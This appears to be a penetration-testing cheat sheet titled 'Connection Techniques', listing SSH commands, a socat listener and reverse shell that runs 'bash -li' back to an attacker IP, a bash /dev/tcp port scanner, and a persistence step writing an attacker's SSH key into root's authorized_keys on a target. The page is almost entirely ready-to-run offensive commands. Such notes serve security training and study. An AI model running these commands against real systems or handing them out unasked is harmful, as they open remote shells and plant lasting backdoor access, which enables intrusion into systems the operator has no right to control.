Connection Techniques

STANDARD SSH COMMAND

ssh user@ip

SSH USING KEYFILE

ssh -i key_file user@ip

SSH USING SPECIFIC ENCRYPTION

ssh -i key_file -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]

SOCAT (more capable)

socat file:`tty`,raw,echo=0 tcp-listen:80
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.188:80

QUICK BASH NETWORK SCANNER

#!/bin/bash
host=10.5.5.11
for port in {1..65535}; do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"

LINUX PERSISTANCE

...create public key on attacking system

kali@kali:~$ ssh-keygen
kali@kali:~$ cat ~/.ssh/id_rsa.pub

...place on target system

echo "copied_ssh_public_key kali@kali" > /root/.ssh/authorized_keys
Scroll to top